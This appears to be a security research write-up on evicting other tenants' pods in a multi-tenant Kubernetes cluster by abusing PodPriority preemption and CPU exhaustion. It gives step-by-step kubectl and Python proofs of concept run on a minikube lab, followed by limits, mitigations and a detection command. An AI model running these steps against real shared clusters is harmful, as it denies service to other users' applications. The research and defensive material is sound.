- The issue concerns multi-tenant kubernetes cluster
- Default kubernetes configuration is affected
- A malicous tenant can create a pod that could preempt any pod on the cluster
The aim is to demonstate how we could perform the Denial-of-Service of another pod in the same kubernetes cluster using PodPriority
.
By DoS we mean: Pod eviction, if the target pod is already running and Block pod rescheduling
Impact | Complexity |
---|---|
DoS of other tenant application | Easy/Intermediate |
- π Theory
- π« PoC
- π§ Limits
- π‘ Protection & Mitigation
- π Cheat Sheet
- π Additional Resources
β² Let's go back to school..
When several users or teams share a cluster with a fixed number of nodes, there is a concern that one team could use more than its fair share of resources ~> Resource Quotas: limit aggregate resource consumption per namespace: quantity of objects + compute resources that may be consumed
Property |
---|
Resource Quota does not applied to already created resources |
-
Object Count Quota: restrict the number of any namespaced resource. example: restrict pod number to 2:
apiVersion: v1 kind: ResourceQuota metadata: name: pods-quota namespace: toto spec: hard: pods: 2
Property |
---|
If quota is enabled in a namespace for compute resources like cpu and memory, users must specify requests or limits for those values |
Request vs Limit: A request is the amount of resource garuanteed by Kubernetes for the container. Conversaly, a limit for a resource is the maximum amount of a resource that Kubernetes will allow to the container use
- 1 ns per team
- Admin creates 1 ResourQuota for each ns
- Users create resources (pods, services, etc.) in the namespace, and the quota system tracks usage to ensure it does not exceed hard resource limits defined in a ResourceQuota.
Pod priority: If a Pod cannot be scheduled, the scheduler tries to preempt (evict) lower priority Pods to make scheduling of the pending Pod possible.
When a pod with priority is in pending mode, the scheduler searches node with lower priority pod and if the eviciton of this pod make the higher priority pod scheduling possible β Lower pod evicted + higher pod scheduled.
- Add one or more PriorityClasses.
- Create Pods with
priorityClassName
That's all! Note that all previous created pods are set with the default Priority (which is 0
)
Property |
---|
It supports eviction decisions based on incompressible resources. Eviction doesnβt happen if pressure is on compressible resources, e.g., CPU. |
Notes: This property only apply to kubelet eviction. CPU resource can actually be used to perform Out-Of-Resource cluster state and thus launching eviction process for higher-priority pod creation.
Property |
---|
In the case of memory pressure:
|
(β) Could we evict already running pod by creating pod with higher priority ?
Yes ! see
(β) Could we block pod scheduling by running higher priority pod ?
Yes ! With the same mechanism. If we have a running higher-priority pod that a specif resource supply is exhausted, all lower-priority pods won't be scheduled till the resource supply is not sufficient see
(β) Is this attack is inter-namespace feasable ?
Yes ! Higher-priority pod can evict pod of another namespace
(β) To trigger Out-of-Resource state, we need to exhaust the resource supply of the cluster ?
No, we need to exhaust the supply of a specific node (see), BUT if the cluster resource supply isn't exhausted and you don't specify the node you want to exhaust, the malicious Pod will be scheduled on a node with adequat supply w/o evicting any pod.
This imply that an attacker can voluntary restrict the zone to deploy higher-priority malicious pods to a single node to trigger the premption process. Indeed, it is easier to stuff a single node than a whole cluster.
However, preempted pods would be rescheduled on other node if they have the right.
(β) Can we change priorityClass
of pods? without having right to directly modify them
No ! You can't change
priorityClass
of running pods BUT you can change the priorityClass of future pods (withglobalDefault
field, priorityClass manipulation, etc...).In general, it is recommended not to grant any rights to users on
priorityClass
if they are not admin to not have priorityClass change for pods.
β² Here we are!
We will put our cluster in Out-Of-Resource state using cpu
oversupply
Use your cluster or create one with 3 nodes and cpu limit at 4
:
minikube start --cpus 4 --nodes 4
In fact, --cpus 4
seems to be useless. It is the value of capacity.cpu
find with kubectl get nodes -o=jsonpath='{range .items[*]}{.metadata.name}{"\t"}{.status.capacity.cpu}{"\n"}{end}'
that has importance (here 4
)
-
Create low-priority pods (ie pods without priorityClass β priority
0
).With a daemonSet to be sure to have one on each node:kubectl apply -f simple/ds-no-pod-priority.yml
At this point, you must have 3 pods running, 1 on each nodes. Each nodes uses ~3 cpu.
-
Create pod with high priority:
kubectl apply -f simple/pod-high.yml
. The key is it musts havecpu
requests so that:- Total cpu requested of all pods is greater than the total amount of cpu available for each nodes β exhaust the supply of CPU
- cpu request is not greater than maximum node cpu β Making the pod scheduling possible (if lower-priority pod is evicted)
See that this will evict a low-priority pod (Pending
status) and start high-priority
pod.
In a multi-tenant cluster, you probably not have access to:
- cpu limit
- information about other pods running in another namespace
- etc ...
To be able to determine which amount of cpu request will trigger an eviction you have to fumble around to get an idea of the cluster state. Indeed, be able to run a high-priority pod does not guarantee us if another pod on another namespace has been evicted or not.
So, the goal is to trigger an out-of-bound resource with lower pod to estimate the amount to request. It lays on the assumption that the cluster is relatively stable (not many pod creation/deletion happen in a minute).
- Create cluster with 3 nodes and cpu.limit to 4, create
bad-tenant
namespace & create thehigh-priority
Priority Class:minikube start --cpus 4 --nodes 3
kubectl create ns bad-tenant
kubectl apply -f priorityClass-high.yml
- Populate the cluster with lower-priority pods (to simulate other tenants activities):
kubectl apply -f ds/ds-no-pod-priority.yml
- Watch pods on both namespaces:
watch -n 0.1 -d kubectl get pods -o wide
watch -n 0.1 -d kubectl get pods -o wide -n bad-tenant
As the tenant, we could only deploy pod in our namespace bad-tenant
.
-
Create a deployment of lower-priority pod:
kubectl apply -f blind/deployment-estimate-no-priority.yml
-
See that the pod of the deployment was succesfully created and is running. Now increase progressively the deployment replicas value:
kubectl -n bad-tenant scale deployment/estimate --replicas=2
kubectl -n bad-tenant scale deployment/estimate --replicas=3
, and so on...
-
When we reach
7
replicas, we observe that the new pod isPending
β We have stuffed our cluster and it is likely out of cpu resource (check withkubectl describe pod [pending_estimate_pod] -n bad-tenant
). Hence, if we create the same deployment with high-priority it will evict some pods on other ns.- delete your low-priority deployment:
kubectl delete -f blind/deployment-estimate-no-priority.yml
- create the high-priority deployment & scale it to have 7 replicas:
kubectl apply -f blind/deployment-high.yml && kubectl -n bad-tenant scale deployment/high-priority-evictor --replicas=7
- delete your low-priority deployment:
See that you actually have evicted a pod on default
namespace!
To easily see on which node the eviction occurs, you can set the replicas to 6
and create an higher-priority pod: the eviction occurs on the same node of this pod.
kubectl apply -f blind/deployment-high.yml && kubectl -n bad-tenant scale deployment/high-priority-evictor --replicas=6 && kubectl apply -f blind/pod-high.yml
Basically you can't choose the pod you will evict BUT you could evict all lower-priority pods including your specific target.
To do this you need to stuff the node where your target pod is. 2 approaches:
- You already know the node where the target pod is running
- You know one label of the target pod
> Assuming we know on which node the target pod is scheduled.
For the PoC we will create a DaemonSet on the default
namespace of a 5-nodes cluster (our target pod is one of these pods). Then we create a malicious higher-priority pod in another namespace that will trigger the eviction of this specific pod.
- create the cluster, populate
default
ns, create priorityClass, createbad-tenant
namespace:minikube start --cpus 4 --nodes 5
kubectl create ns bad-tenant
kubectl apply -f priorityClass-high.yml
kubectl apply -f ds/ds-no-pod-priority.yml
- Watch pods on both namespaces:
watch -n 0.1 -d kubectl get pods -o wide
watch -n 0.1 -d kubectl get pods -o wide -n bad-tenant
Assuming our target is on node minikube-m02
. Our aim is know to stuff this specific node. To do so:
- Schedule a pod (
scout
) on this node with a specific label (force sheduling withpod.spec.nodeName
):kubectl apply -f target/scout.yml
- Create the deployment to stuff the node, to do so add
podAffinity
to your deployment's pod with thescout
pod:kubectl apply -f target/deployment-high-affinity.yml
- Scale the deployment progressively till you evict a Pod on
default
ns:kubectl -n bad-tenant scale deployment.apps/deployment-high-affinity --replicas=2
You have evicted the target pod on minikube-m02
!
Notes:
- Why not using
nodeName
for the deployment instead of podaffinity? Cause when you specifynodeName
, the scheduling process is not hte same and the preemption does not occur (OutOfCpu
status for your higher-priority pods instead) - In a more realistic scenario you wouldn't see where the eviction happen. To see a more realistic approach: Blind PoC
> Assuming we know label of the target pod
For the PoC we will create pods on the default
namespace of a 3-nodes cluster (including our target). Then we create a malicious higher-priority pod in another namespace that will trigger the eviction of this specific pod.
The set-up process in nearly the same as the one of the blind DoS section.
- create the cluster, populate
default
ns, create priorityClass, createbad-tenant
namespace:minikube start --cpus 4 --nodes 3
kubectl create ns bad-tenant
kubectl apply -f priorityClass-high.yml
kubectl apply -f ds/ds-no-pod-priority.yml
- Create the target pod (no priorityClass + specific label):
kubectl apply -f target/target-pod.yml
- Determine the number of higher-priority pods to create to stuff nodes (see Blind DoS). Create consequently deployment of higher-priority pods with the adequat
replica
value:kubectl apply -f target/deployment-high.yml && kubectl -n bad-tenant scale deployment/deployment-high-priority --replicas=5
- Watch pods on both namespaces:
watch -n 0.1 -d kubectl get pods -o wide
watch -n 0.1 -d kubectl get pods -o wide -n bad-tenant
Now we have a cluster with stuffed nodes. We want to evict target
pod of another tenant within another namespace. We have succeed to obtain specific labels of the target pod. We are going to use them with podAntiffinity
. We will instruct kubernetes to schedule our higher-priority pod on a node where the target
pod is not.
As all the node are stuffed and can't schedule the higher-priority pod without reaching a cpu Out-Of-Resource the anti-affinity can't be respected. The podAntiAffinity
will then force the scheduling of the higher-priority pod where the target pod is, triggering its eviction.
- Create the high-priority pod:
kubectl apply -f target/pod-high.yml
(see limits to have more details)
before running all scripts:
pip install kubernetes
To find how many replicas you need to create to stuff the cluster and thus being near a Cluster Out-of-Cpu state:
python3 estimate-cpu-supply.py -n bad-tenant --cpu 1 --increment 1 --replicas 2 --timeout 10
It will output the number of replica needed for this purpose.
Now we want to perform eviction: stuff cluster + create evictor/preemptor-pod:
python3 evict.py -n bad-tenant --cpu 1 --replicas 5
And if you like one-liner, estimate how to stuff the cluster & evict right after:
python3 evict.py --replicas $(python3 estimate-cpu-supply.py && sleep 10)
- If you reach the
ResourceQuota
you could not create the malicious pod (it won't be place in pending mode, so not in scheduling queue). So the attack is not doable. - In the case of memory pressure, pods are sorted first based on whether their memory usage exceeds their request or not, then by pod priority, and then by consumption of memory relative to memory requests
OutOfCPu
can occurs for higher-priority pod (especially fromdeployment
) even if lower-priority pods are running. It is because the named node where you higher-priority pods specify the scheduling does not have the resources to accommodate the pod => pod fail. This is why you can't specify apod.spec.nodeName
in your malicious pod to evict pod of a specific node.- This not apply to
pod.spec.nodeSelector
,pod.spec.affinity.nodeAffinity
,pod.spec.affinity.podAffinity
andpod.spec.affinity.podAntiAffinity
(as it does not named a node). You can use them to perform lower-priority pod eviction on targeted node. - Nethertheless, you can't use
pod.spec.affinity.podAffinity
with affinity with a pod you aim to evict => high-priority pod will stay pending. see - With
pod.spec.affinity.podAntiAffinity
usepreferredDuringSchedulingIgnoredDuringExecution
- This not apply to
- Put
ResourceQuota
on each namespaces to limit resource use. Check that the addition of the wholes limits & requests within aren't higher than the overall of the cluster resources- In addition, enforce specification of pod resources
- launch an alert based on limit and requests (if no limit are supplied in resourcequota, resource requests is too big, etc...)
- Allow
ResourceQuota
,priorityClass
use only for admin users (generally the same for all cluster-wide resources) - Add rules via admission controller to prevent specific use of higher PriorityClasses (e.g. disallow
system-node-critical
for non-admin ns) - Create Non-preempting PriorityClass (with
preemptionPolicy: Never
) to block preemption by higher priority pods ~> higher-priority pods are placed in the scheduling queue ahead of lower-priority pods, but they cannot preempt other pods. This comes w/ a downside: pods with lower priority could be scheduled before them (see)
- Watch
FailedScheduling
orPrempted
event to detect cpu starvation and eviction :kubectl -n bad-tenant get events --sort-by='.metadata.creationTimestamp' -A --watch | grep -E "FailedScheduling|Preempted" --color
- Get clusters resources available:
kubectl top nodes
(need the right to list resource "nodes" in API group "metrics.k8s.io" at the cluster scope + metric-server deployed)- enable metric-server w/ minikube:
minikube addons enable metrics-server
- otherwise use
kubectl get nodes -o=jsonpath='{range .items[*]}{.metadata.name}{"\t"}{.status.capacity.cpu}{"\n"}{end}'
- enable metric-server w/ minikube:
- Get pod priority classes:
kubectl get PriorityClass
cpu
usage- stats on container cpu usage (%):
docker stats [container_name]
- docker cpu limit: (in container)
cat /sys/fs/cgroup/cpu/cpu.cfs_quota_us
divided bycat /sys/fs/cgroup/cpu/cpu.cfs_period_us
give us the limit number of cpu allocated for the container kubectl describe nodes [node_name]
- stats on container cpu usage (%):
- Watch pod changement in namespace:
watch -d -n 0.1 -t kubectl get pods -o wide
- Scale a deployment:
kubectl scale deployment/[name] --replicas=3
- Resource Quota
- Pod priority preemption
- Kubernetes - Pods are prempted but the preemptor is not scheduled
- Preemption order
- Article on Pod Priority
- Article on Pod Priority & Pod eviction
- try with other resource than cpu